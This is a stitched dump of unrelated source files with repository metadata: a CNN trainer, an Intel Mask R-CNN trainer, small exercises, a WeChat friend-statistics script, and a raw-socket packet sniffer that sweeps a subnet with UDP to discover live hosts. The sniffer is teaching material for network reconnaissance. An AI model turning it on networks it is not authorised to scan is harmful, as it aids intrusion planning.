print('info: change detected in target group {}, for bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
else:
print('info: no change detected in target group {}, for bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
for tagKey in ['workerType', 'sourceOrganisation', 'sourceRepository', 'sourceRevision', 'sourceScript', 'deploymentId']:
currentTagValue = next((tag for tag in currentTargetGroupConfig['tag'] if tag['name'] == tagKey), { 'value': '' })['value']
previousTagValue = next((tag for tag in previousTargetGroupConfig['tag'] if tag['name'] == tagKey), { 'value': '' })['value']
if currentTagValue == previousTagValue:
print('debug: no change detected for tag {}, with value "{}", in target group {}, in {}.yaml between last image build in revision: {} and current revision: {}'.format(tagKey, currentTagValue, group, key, previousRevision[0:7], currentRevision[0:7]))
else:
targetTagsUnchanged = False
print('info: change detected for tag {}, with previous value "{}", and new value "{}", in target group {}, in {}.yaml between last image build in revision: {} and current revision: {}'.format(tagKey, previousTagValue, currentTagValue, group, key, previousRevision[0:7], currentRevision[0:7]))
return not (targetBootstrapUnchanged and targetTagsUnchanged)
def machineImageExists(taskclusterIndex, platformClient, platform, group, key):
artifact = taskclusterIndex.findArtifactFromTask(
'project.relops.cloud-image-builder.{}.{}.latest'.format(platform, key.replace('-{}'.format(platform), '')),
'public/image-bucket-resource.json')
image = None
if platform == 'azure':
imageName = '{}-{}-{}'.format(group.replace('rg-', ''), key.replace('-{}'.format(platform), ''), artifact['build']['revision'][0:7])
try:
image = platformClient.images.get(group, imageName)
print('{} machine image: {} found with id: {}'.format(platform, imageName, image.id))
except:
image = None
print('{} machine image: {} not found'.format(platform, imageName))
#elif platform == 'amazon':
return image is not None
|
[
"rthijssen@gmail.com"
] |
rthijssen@gmail.com
|
7cd3ad3b9c2bd241d97911ad2747e505a813da0f
|
678c8ca14253ed854e5e45d2821ee2c9b39c3a6f
|
/venv/bin/isort-identify-imports
|
ec4dc8cf2f2912dc8d69b8b5a129757cd519b581
|
[] |
no_license
|
Wade-Philander/flask
|
386593bdffc3be2981b59edeb39c96dbbc398278
|
5ab7fcc4f3f2d1567b0fe4b0600dc96c2f1b01c0
|
refs/heads/main
| 2023-03-01T01:38:24.474212
| 2021-02-09T08:16:36
| 2021-02-09T08:16:36
| 337,100,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 266
|
#!/home/user/uber-ladies/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from isort.main import identify_imports_main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(identify_imports_main())
|
[
"wadephilander7@gmail.com"
] |
wadephilander7@gmail.com
|
|
ad8427a59154bcb1575bed1b77b319a6f99a58da
|
8b6eeff24db9fb119f7f543ae6163f766fb715e6
|
/train.py
|
516d2c06392454eec537670a1ca76f5c87545068
|
[] |
no_license
|
dalmouiee/comp9417
|
e1d003aee888a073ed3da46081206ee65ecaaf91
|
486498c06c25fc386458fff7e304f8809c0f7c2f
|
refs/heads/master
| 2022-01-31T10:13:07.306605
| 2019-08-08T02:56:14
| 2019-08-08T02:56:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,035
|
py
|
import math, random, os, sys, time, glob, cv2
import tensorflow as tf
import numpy as np
from sklearn.utils import shuffle
import matplotlib.pyplot as plt
from numpy import array
# Hyperparameters
batchSize = 16
imageSize = 64
numChannels = 3
categories = ['positive', 'negative']
def createPlaceholders():
x = tf.placeholder(tf.float32, shape=[None, imageSize, imageSize, numChannels], name='x')
y = tf.placeholder(tf.float32, shape=[None, len(categories)], name='y')
yClasses = tf.argmax(y, dimension=1)
return x, y, yClasses
# Network parameters
filter_size_conv1 = 3
num_filters_conv1 = 32
filter_size_conv2 = 3
num_filters_conv2 = 32
filter_size_conv3 = 3
num_filters_conv3 = 64
filter_size_conv4 = 3
num_filters_conv4 = 32
filter_size_conv5 = 3
num_filters_conv5 = 64
fc_layer_size = 128
def preprocessImages(trainingPath):
images = []
labels = []
img_names = []
print('Processing training images:------------------')
'''for bp in bodyParts:
print("----------------- Reading Body Part: " + bp)
patients = os.listdir(trainingPath + "/" + bp)'''
for fields in categories:
index = categories.index(fields)
print('Now going to read {} files (Index: {})'.format(fields, index))
path = os.path.join(trainingPath, fields, '*g')
files = glob.glob(path)
for fl in files:
image = cv2.imread(fl)
image = cv2.resize(image, (imageSize, imageSize),0,0, cv2.INTER_LINEAR)
image = image.astype(np.float32)
image = np.multiply(image, 1.0 / 255.0)
images.append(image)
label = np.zeros(len(categories))
label[index] = 1.0
labels.append(label)
flbase = os.path.basename(fl)
img_names.append(flbase)
images = np.array(images)
labels = np.array(labels)
img_names = np.array(img_names)
imagesList, labelsList, namesList = shuffle(images, labels, img_names)
return imagesList, labelsList, namesList
# Fix shuffling function for these
def makeTrainSet(images, labels, names, validationSize):
imagesList = images[validationSize:]
labelsList = labels[validationSize:]
namesList = names[validationSize:]
#imagesList, labelsList, namesList = shuffle(imagesList, labelsList, namesList)
return imagesList, labelsList, namesList
def makeValidationSet(images, labels, names, validationSize):
imagesList = images[:validationSize]
labelsList = labels[:validationSize]
namesList = names[:validationSize]
#imagesList, labelsList, namesList = shuffle(imagesList, labelsList, namesList)
return imagesList, labelsList, namesList
def getNewBatch(set, bound, booly):
xBatch = set[0]
yBatch = set[1]
newBound = bound + batchSize
if booly == 0:
booly = set[0]
else:
booly = set[1]
if newBound > len(booly):
newBound = newBound % len(set[0])
return (xBatch[bound:]), (yBatch[bound:])
else:
return xBatch[bound:newBound], yBatch[bound:newBound]
def updateBounds(trainingBound, trainingSet, validBound, validationSet):
if trainingBound > len(trainingSet[0]):
trainingBound = (trainingBound + batchSize) % len(trainingSet[0])
else:
trainingBound += batchSize
if validBound > len(validationSet[0]):
validBound = (validBound + batchSize) % len(validationSet[0])
else:
validBound += batchSize
return trainingBound, validBound
def fixClassLabel(className):
if "negative" in className:
className = "negative"
else:
className = "positive"
return className
# Convolutional neural netowrk layer
def create_convolutional_layer(input, num_input_channels, conv_filter_size, num_filters):
weights = tf.Variable(tf.truncated_normal([conv_filter_size, conv_filter_size, num_input_channels, num_filters],
stddev=0.05))
biases = tf.Variable(tf.constant(0.05, shape=[num_filters]))
## Creating the convolutional layer
layer = tf.nn.conv2d(input=input, filter=weights, strides=[1, 1, 1, 1], padding='SAME')
layer += biases
## Max-pooling.
layer = tf.nn.max_pool(value=layer, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
## Relu: activation function
layer = tf.nn.relu(layer)
return layer
def create_flatten_layer(layer):
# Shape of the layer will be [batch_size img_size img_size num_channels]
# Get it from the previous layer.
layer_shape = layer.get_shape()
## Number of features will be img_height * img_width* num_channels.
num_features = layer_shape[1:4].num_elements()
## Flatten the layer so we shall have to reshape to num_features
layer = tf.reshape(layer, [-1, num_features])
return layer
# Fully-connected layer
def create_fc_layer(input,
num_inputs,
num_outputs,
use_relu=True):
# Define trainable weights and biases
weights = tf.Variable(tf.truncated_normal([num_inputs, num_outputs], stddev=0.05))
biases = tf.Variable(tf.constant(0.05, shape=[num_outputs]))
# Fully connected layer takes input x and produces wx+b.
layer = tf.matmul(input, weights) + biases
if use_relu:
layer = tf.nn.relu(layer)
return layer
def show_progress(session, epoch, feed_dict_train, feed_dict_validate, val_loss, accuracy,
merged, train_writer, test_writer, i):
msg = "Training Epoch {0} --- Training Accuracy: {1:>6.1%}, Validation Accuracy: {2:>6.1%}, Validation Loss: {3:.3f}"
summary_train, acc = session.run([merged, accuracy], feed_dict=feed_dict_train)
if math.isnan(acc):
return
train_writer.add_summary(summary_train, i)
summary_test, val_acc = session.run([merged, accuracy], feed_dict=feed_dict_validate)
if math.isnan(val_acc):
return
test_writer.add_summary(summary_test, i)
print(msg.format(epoch + 1, acc, val_acc, val_loss))
#val_acc = session.run(accuracy, feed_dict=feed_dict_validate)
def train(session, saver, trainingSet, validationSet, optimiser, cost, accuracy, merged, trainWriter,
testWriter, num_iteration, x, y):
total_iterations = 0
trainingBound = 0
validBound = 0
for i in range(total_iterations,
total_iterations + num_iteration):
# Get next batch in sets and assign them
x_batch, y_true_batch = getNewBatch(trainingSet, trainingBound, 0)
x_valid_batch, y_valid_batch = getNewBatch(validationSet, validBound, 1)
# make sure bounds dont overflow
trainingBound, validBound = updateBounds(trainingBound, trainingSet, validBound, validationSet)
# feed training and validation batchs
feed_dict_tr = {x: x_batch, y: y_true_batch}
feed_dict_val = {x: x_valid_batch, y: y_valid_batch}
# run training algo
session.run(optimiser, feed_dict=feed_dict_tr)
if i % 20 == 0:
val_loss = session.run(cost, feed_dict=feed_dict_val)
epoch = int(i/10)
show_progress(session, epoch, feed_dict_tr, feed_dict_val, val_loss,
accuracy, merged, trainWriter, testWriter, i)
saver.save(session, './modelCheckpoints/MURA-model')
total_iterations += num_iteration
def main():
# Path to training set: ("MURA-v1.1\train")
trainingPath = sys.argv[1]
# preprocess images by reading from directory using CV2
images, labels, img_names = preprocessImages(trainingPath)
# 10% of images for validation
validationSize = int(0.25*len(images))
# List holds
# 1) List of images
# 2) List of Labels
# 3) List of Image names
# in order for each image processed
trainingSet = makeTrainSet(images, labels, img_names, validationSize) #['images','labels','imgnames']
validationSet = makeValidationSet(images, labels, img_names, validationSize) #['images','labels','imgnames']
#data = dataset.read_train_sets(train_path, img_size)
print("Number of files in Training-set:\t\t{}".format(len(trainingSet[1])))
print("Number of files in Validation-set:\t{}".format(len(validationSet[1])))
x, y, yClasses = createPlaceholders()
layer_conv1 = create_convolutional_layer(input=x,
num_input_channels=numChannels,
conv_filter_size=filter_size_conv1,
num_filters=num_filters_conv1)
layer_conv2 = create_convolutional_layer(input=layer_conv1,
num_input_channels=num_filters_conv1,
conv_filter_size=filter_size_conv2,
num_filters=num_filters_conv2)
layer_conv3= create_convolutional_layer(input=layer_conv2,
num_input_channels=num_filters_conv2,
conv_filter_size=filter_size_conv3,
num_filters=num_filters_conv3)
layer_flat = create_flatten_layer(layer_conv3)
layer_fc1 = create_fc_layer(input=layer_flat,
num_inputs=layer_flat.get_shape()[1:4].num_elements(),
num_outputs=fc_layer_size,
use_relu=True)
layer_fc2 = create_fc_layer(input=layer_fc1,
num_inputs=fc_layer_size,
num_outputs=len(categories),
use_relu=False)
y_pred = tf.compat.v1.nn.softmax(layer_fc2,name='y_pred')
y_pred_cls = tf.compat.v1.argmax(y_pred, dimension=1)
session = tf.Session()
session.run(tf.global_variables_initializer())
crossEntropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=layer_fc2, labels=y)
cost = tf.reduce_mean(crossEntropy)
tf.summary.scalar('cost',cost)
optimiser = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)
correctPrediction = tf.equal(y_pred_cls, yClasses)
accuracy = tf.reduce_mean(tf.cast(correctPrediction, tf.float32))
tf.summary.scalar('accuracy',accuracy)
merged = tf.compat.v1.summary.merge_all()
trainWriter = tf.compat.v1.summary.FileWriter('summary/train', session.graph)
testWriter = tf.compat.v1.summary.FileWriter('summary/test')
session.run(tf.global_variables_initializer())
saver = tf.compat.v1.train.Saver()
# 4000 magic number best performance on my pc, but on different devices this number changes...
train(session, saver, trainingSet, validationSet, optimiser, cost, accuracy, merged,
trainWriter, testWriter , 4000, x, y)
# Following 2 methods from the tutorial:
# https://medium.com/@awjuliani/visualizing-neural-network-layer-activation-tensorflow-tutorial-d45f8bf7bbc4
def getActivations(layer,stimuli):
units = session.run(layer,feed_dict={x:array(stimuli).reshape(1, imageSize,imageSize,numChannels)})
plotNNFilter(units)
def plotNNFilter(units):
filters = units.shape[3]
plt.figure(1, figsize=(20,20))
n_columns = 6
n_rows = math.ceil(filters / n_columns) + 1
for i in range(filters):
plt.subplot(n_rows, n_columns, i+1)
plt.title('Filter ' + str(i))
plt.imshow(units[0,:,:,i], interpolation="nearest", cmap="gray")
plt.show()
imageToUse = trainingSet[0][0]
plt.imshow(imageToUse, interpolation="nearest", cmap="gray")
plt.show()
getActivations(layer_conv3,imageToUse)
############################
# START OF PROGRAM
main()
|
[
"d.almouiee@gmail.com"
] |
d.almouiee@gmail.com
|
07b55d4c6d747ab587d2a653c986f6dcf3e7ad63
|
a25049ab1d4fa9fb1fcce26d075060ad15ec0a21
|
/MovingBall.pyde
|
e4793e35fb71e00cad2b7044f362fa6617b04382
|
[] |
no_license
|
ABahASC/Alpha_ASC3
|
a5fd1e8a27c36df44fe5b00f3fb9c3a6b6a92f0e
|
226264877a800b7f11a99bdd0bd732b934aa727d
|
refs/heads/master
| 2020-03-28T01:04:30.195960
| 2016-08-02T18:18:45
| 2016-08-02T18:18:45
| 63,184,210
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 315
|
pyde
|
x=200;
y=1;
speed = 1
def setup():
size (400,400);
smooth();
background(0);
noStroke();
fill(0,255,0);
def draw():
global x
global y
global speed
background(0);
rect(mouseX,330,40,40)
ellipse(x, 200, 40, 40);
x=x+y;
if (x>width-20 or x<20):
y=-y;
|
[
"alphabah212@gmail.com"
] |
alphabah212@gmail.com
|
8e685c4e4ad274a232060c4f31069754801a1c1f
|
88e7541b98a3b0d04b530438e88f875ae495e5d2
|
/dasgal8.py
|
36a8243b90da306a79bd10dc7f0dc1ece96d4aa7
|
[] |
no_license
|
ganbatz/phyton3
|
b8431ab0097ed97b1de04dc0a6db4c3736cc026b
|
8b6add2a25a28f34026d3ddb63772f5c3d756559
|
refs/heads/master
| 2022-06-24T09:28:40.868184
| 2020-05-09T17:41:07
| 2020-05-09T17:41:07
| 262,625,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 174
|
py
|
# 3 toonii bagiig ol
n1 = int(input())
n2 = int(input())
n3 = int(input())
if n1<n2 and n1<n3:
print(n1)
elif n2<n1 and n2<n3:
print(n2)
else:
print(n3)
|
[
"noreply@github.com"
] |
noreply@github.com
|
541499ca55be3f2e1263c133d3499ab8864a3f6e
|
0649c9b00358dd7b3ca418f7ce15ff88507ed6b3
|
/storage_data.py
|
bbaf647ccba897a5ed812da12c2ddb2007fc1b50
|
[] |
no_license
|
Aaron9477/sky_lake
|
9c9b7904dbd3e36a366508aa0d3beccedd7355d9
|
baaba25bc72c81cf0868136a623036529eb9a840
|
refs/heads/master
| 2021-08-08T00:02:03.903907
| 2017-11-09T06:54:31
| 2017-11-09T06:54:31
| 109,121,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 100
|
py
|
import src.utils as u
if __name__ == '__main__':
for m in u.get_malls():
u.get_data(m)
|
[
"869788668@qq.com"
] |
869788668@qq.com
|
8c203afbdbef4e2245e6299014638e4b27f91d43
|
778548a8609bfcf098e6681c5bbab34152b694bb
|
/models/object_detection/pytorch/maskrcnn/maskrcnn-benchmark/maskrcnn_benchmark/engine/trainer.py
|
050f70a5859206f737c74c7debc3a31e072cd994
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
rahulunair/models
|
695a0077430820e449437399355107eb999fe2e3
|
75171f0271807944857ece42589b378469017f1e
|
refs/heads/master
| 2023-04-08T04:22:13.359790
| 2022-07-14T20:03:02
| 2022-07-14T20:03:02
| 178,485,628
| 0
| 0
|
Apache-2.0
| 2020-01-09T16:45:11
| 2019-03-29T23:00:22
|
Python
|
UTF-8
|
Python
| false
| false
| 8,610
|
py
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import datetime
import logging
import os
import time
import torch
import torch.distributed as dist
from tqdm import tqdm
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.utils.comm import get_world_size, synchronize
from maskrcnn_benchmark.utils.metric_logger import MetricLogger
from maskrcnn_benchmark.engine.inference import inference
from ..utils.timer import Timer, get_time_str
import intel_extension_for_pytorch as ipex
def reduce_loss_dict(loss_dict):
"""
Reduce the loss dictionary from all processes so that process with rank
0 has the averaged results. Returns a dict with the same fields as
loss_dict, after reduction.
"""
world_size = get_world_size()
if world_size < 2:
return loss_dict
with torch.no_grad():
loss_names = []
all_losses = []
for k in sorted(loss_dict.keys()):
loss_names.append(k)
all_losses.append(loss_dict[k])
all_losses = torch.stack(all_losses, dim=0)
dist.reduce(all_losses, dst=0)
if dist.get_rank() == 0:
# only main process gets accumulated, so only divide by
# world_size in this case
all_losses /= world_size
reduced_losses = {k: v for k, v in zip(loss_names, all_losses)}
return reduced_losses
def do_train(
cfg,
model,
data_loader,
data_loader_val,
optimizer,
scheduler,
checkpointer,
device,
checkpoint_period,
test_period,
arguments,
bf16=False,
iterations=-1,
iter_warmup=-1
):
logger = logging.getLogger("maskrcnn_benchmark.trainer")
logger.info("Start training")
meters = MetricLogger(delimiter=" ")
max_iter = len(data_loader)
start_iter = arguments["iteration"]
model.train()
training_timer = Timer()
start_training_time = time.time()
end = time.time()
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
if cfg.MODEL.KEYPOINT_ON:
iou_types = iou_types + ("keypoints",)
dataset_names = cfg.DATASETS.TEST
model, optimizer = ipex.optimize(model, dtype=torch.bfloat16 if bf16 else torch.float, optimizer=optimizer, inplace=True)
for iteration, (images, targets, _) in enumerate(data_loader, start_iter):
if any(len(target) < 1 for target in targets):
logger.error(f"Iteration={iteration + 1} || Image Ids used for training {_} || targets Length={[len(target) for target in targets]}" )
continue
data_time = time.time() - end
iteration = iteration + 1
arguments["iteration"] = iteration
images = images.to(device)
targets = [target.to(device) for target in targets]
if iteration > iter_warmup:
training_timer.tic()
with torch.cpu.amp.autocast(enabled=bf16):
loss_dict = model(images.to(memory_format=torch.channels_last), targets)
losses = sum(loss.to(torch.float32) for loss in loss_dict.values())
# reduce losses over all GPUs for logging purposes
loss_dict_reduced = reduce_loss_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
meters.update(loss=losses_reduced, **loss_dict_reduced)
optimizer.zero_grad()
losses.backward()
optimizer.step()
scheduler.step()
if iteration > iter_warmup:
training_timer.toc()
batch_time = time.time() - end
end = time.time()
meters.update(time=batch_time, data=data_time)
eta_seconds = meters.time.global_avg * (max_iter - iteration)
eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))
if iteration % 1 == 0 or iteration == max_iter:
logger.info(
meters.delimiter.join(
[
"eta: {eta}",
"iter: {iter}",
"{meters}",
"lr: {lr:.6f}",
"max mem: {memory:.0f}",
]
).format(
eta=eta_string,
iter=iteration,
meters=str(meters),
lr=optimizer.param_groups[0]["lr"],
memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,
)
)
if iteration % checkpoint_period == 0:
checkpointer.save("model_{:07d}".format(iteration), **arguments)
if data_loader_val is not None and test_period > 0 and iteration % test_period == 0:
meters_val = MetricLogger(delimiter=" ")
synchronize()
_ = inference( # The result can be used for additional logging, e. g. for TensorBoard
model,
# The method changes the segmentation mask format in a data loader,
# so every time a new data loader is created:
make_data_loader(cfg, is_train=False, is_distributed=(get_world_size() > 1), is_for_period=True),
dataset_name="[Validation]",
iou_types=iou_types,
box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=None,
)
synchronize()
model.train()
with torch.no_grad():
# Should be one image for each GPU:
for iteration_val, (images_val, targets_val, _) in enumerate(tqdm(data_loader_val)):
images_val = images_val.to(device)
targets_val = [target.to(device) for target in targets_val]
loss_dict = model(images_val, targets_val)
losses = sum(loss for loss in loss_dict.values())
loss_dict_reduced = reduce_loss_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
meters_val.update(loss=losses_reduced, **loss_dict_reduced)
synchronize()
logger.info(
meters_val.delimiter.join(
[
"[Validation]: ",
"eta: {eta}",
"iter: {iter}",
"{meters}",
"lr: {lr:.6f}",
"max mem: {memory:.0f}",
]
).format(
eta=eta_string,
iter=iteration,
meters=str(meters_val),
lr=optimizer.param_groups[0]["lr"],
memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,
)
)
if iterations <= 0:
if iteration == max_iter:
checkpointer.save("model_final", **arguments)
elif iter_warmup > 0:
if iteration == iterations + iter_warmup:
break
else:
if iteration == iterations:
break
total_training_time = time.time() - start_training_time
total_time_str = str(datetime.timedelta(seconds=total_training_time))
if iterations <= 0:
iterations = max_iter
logger.info(
"Total training time: {} ({:.4f} s / it)".format(
total_time_str, total_training_time / iterations
)
)
total_train_time = get_time_str(training_timer.total_time)
logger.info(
"Model training time: {} ({} s / iter per device)".format(
total_train_time,
training_timer.total_time / iterations
)
)
print("Training throughput: {:.3f} fps".format((iterations * cfg.SOLVER.IMS_PER_BATCH) / (training_timer.total_time)))
|
[
"abolfazl.shahbazi@intel.com"
] |
abolfazl.shahbazi@intel.com
|
69479901b7cfdb541375dc320f6e72740a4e772b
|
e7a0ed2c4752253a87ff74bad6761165a37e834b
|
/BellmanFord.py
|
f861af60616a1e7b182af0abd57db1815c5610c6
|
[] |
no_license
|
ilius/Algorithms-Python
|
09ac02ff6010e882775d22824940f22185a768c5
|
1d7d44859650ab9d36e6316c39a5d1400b3d3bc1
|
refs/heads/master
| 2021-01-17T14:27:55.846495
| 2013-11-19T20:18:30
| 2013-11-19T20:18:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import GraphLib
import DirectedEdge, ShortestPath
# negative cycle
with open('tinyEWDnc.txt', 'r') as f:
V = int(f.readline().strip())
E = int(f.readline().strip())
text = f.read()
f.close()
Gnc = GraphLib.EdgeWeightedDigraph(V)
lines = text.split('\n')
for line in lines[:-1]: # last line is empty
l = line.split()
v = int(l[0])
w = int(l[1])
weight = float(l[2])
Gnc.addEdge(DirectedEdge.DEdge(v, w, weight))
# negative weight
with open('tinyEWDn.txt', 'r') as f:
V = int(f.readline().strip())
E = int(f.readline().strip())
text = f.read()
f.close()
Gn = GraphLib.EdgeWeightedDigraph(V)
lines = text.split('\n')
for line in lines[:-1]: # last line is empty
l = line.split()
v = int(l[0])
w = int(l[1])
weight = float(l[2])
Gn.addEdge(DirectedEdge.DEdge(v, w, weight))
bn = ShortestPath.BellmanFord(Gn, 0)
bn.hasNegativeCycle()
bn.hasPathTo(6)
bn.pathTo(6)
bn.distTo(6)
|
[
"leslieklein@comcast.net"
] |
leslieklein@comcast.net
|
1f62074c0c85f84ac88700f413546240cba19622
|
ec78979fd8479e884ab93d723360744db5152134
|
/wechat_stat.py
|
e05254f8304d487894b38f59d8004251e12e30bd
|
[] |
no_license
|
xushubo/learn-python
|
49c5f4fab1ac0e06c91eaa6bd54159fd661de0b9
|
8cb6f0cc23d37011442a56f1c5a11f99b1179ce6
|
refs/heads/master
| 2021-01-19T17:00:05.247958
| 2017-09-03T03:22:28
| 2017-09-03T03:22:28
| 101,032,298
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
import itchat
from echarts import Echart, Legend, Pie
itchat.login() #登录
friends = itchat.get_friends(update=True)[0:] #获取好友列表
male = female = other = 0 #初始化计数器,男、女、不填的
for i in friends[1:]: #遍历好友列表,列表第一个是自己,所以从1开始计算 1表示男性,2女性
sex = i['Sex']
if sex == 1:
male +=1
elif sex == 2:
female += 1
else:
other += 1
total = len(friends[1:])
print('wechat好友总数:%d' % total)
print('男性好友: %.2f%%' % (float(male)/total*100))
print('女性好友: %.2f%%' % (float(female)/total*100))
print('其他: %.2f%%' % (float(other)/total*100))
'''
chart = Echart('%s的微信好友性别比例' % (friends[0]['NickName']), 'from WeChat')
chart.use(Pie('WeChat', [{'value': male, 'name': '男性 %.2f%%' % (float(male) / total * 100)}, {'value': female, 'name': '女性 %.2f%%' % (float(female) / total * 100)}, {'value': other, 'name': '其他 %.2f%%' % (float(other) / total * 100)}], radius=["50%", "70%"]))
chart.use(Legend(['male', 'female', 'other']))
del chart.json['xAxis']
del chart.json['yAxis']
chart.plot()
'''
|
[
"tmac523@163.com"
] |
tmac523@163.com
|
c3b32385840796ed26b9f8080a349b5791153a94
|
97ef7d275cdbc37b45b8ce4225919a89378d59dc
|
/c3_sniffer.py
|
c67c99422f7e626a94b0705d11c05ab3f7cb8dff
|
[] |
no_license
|
tediswht/blackhatpython
|
d49dc848c0a797825e4c58eb62c92c2a37cf1730
|
52402ed624ceab5a59514b13dd0be28483807692
|
refs/heads/master
| 2020-07-25T08:35:46.095785
| 2019-10-03T02:12:56
| 2019-10-03T02:12:56
| 208,232,376
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,028
|
py
|
import struct
import socket
import os
from ctypes import *
import threading
import time
from netaddr import IPNetwork,IPAddress
host = '192.168.1.4'
subnet = "192.168.1.0/24"
mes = "hipython"
def udp_sender(subnet,mes):
time.sleep(1)
sender = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(mes,("%s"%ip,65212))
print("sent to %s"%ip,65212)
except:
pass
class IP(Structure):
_fields_=[
("ihl",c_ubyte,4),
("version",c_ubyte,4),
("tos",c_ubyte),
("len",c_ushort),
("id",c_ushort),
("offset",c_ushort),
("ttl",c_ubyte),
("protocol_num",c_ubyte),
("sum",c_ushort),
("src",c_uint32),
("dst",c_uint32)
]
def __new__(self,socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self,sock_buffer=None):
self.protocol_map={1:"ICMP",6:"TCP",17:"UDP"}
self.src_address=socket.inet_ntoa(struct.pack("<L",self.src))
self.dst_address=socket.inet_ntoa(struct.pack("<L",self.dst))
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
class ICMP(Structure):
_fields_ = [
("type",c_ubyte),
("code",c_ubyte),
("checksum",c_ushort),
("unused",c_ushort),
("next_hop_mtu",c_ushort)
]
def __new__(self,socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self,socket_buffer):
pass
if os.name == "nt":
socket_pro=socket.IPPROTO_IP
else:
socket_pro=socket.IPPROTO_ICMP
sniffer=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket_pro)
sniffer.bind((host,0))
sniffer.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_ON)
t=threading.Thread(target=udp_sender,args=(subnet,mes))
t.start()
try:
while True:
raw_buffer = sniffer.recvfrom(65565)[0]
ip_header = IP(raw_buffer[0:20])
print("Protocol:%s %s -> %s"%(ip_header.protocol,ip_header.src_address,ip_header.dst_address))
if ip_header.protocol=="ICMP":
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset+sizeof(ICMP)]
icmp_header = ICMP(buf)
print("ICMP -> Type:%d code: %d"%(icmp_header.type,icmp_header.code))
if icmp_header.code==3 and icmp_header.type ==3 :
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
if raw_buffer[len(raw_buffer)-len(mes):]==mes:
print("Host up %s"%ip_header.src_address)
except KeyboardInterrupt:
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_OFF)
|
[
"noreply@github.com"
] |
noreply@github.com
|
d05b8fe31cb2b3669e6ffacc405b55cbda7ff8b4
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/tunnel/lsite.py
|
cf53b4bf12e69f5b767bc243bd15658320be6f5d
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381
| 2020-01-20T09:18:28
| 2020-01-20T09:18:28
| 235,065,676
| 0
| 0
| null | 2023-05-01T21:19:14
| 2020-01-20T09:36:37
|
Python
|
UTF-8
|
Python
| false
| false
| 5,189
|
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class LSite(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = ClassMeta("cobra.model.tunnel.LSite")
meta.moClassName = "tunnelLSite"
meta.rnFormat = "lsite-%(id)s"
meta.category = MoCategory.REGULAR
meta.label = "Tunnel info for the local site in a multisite topology"
meta.writeAccessMask = 0x400000000001
meta.readAccessMask = 0x400000000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
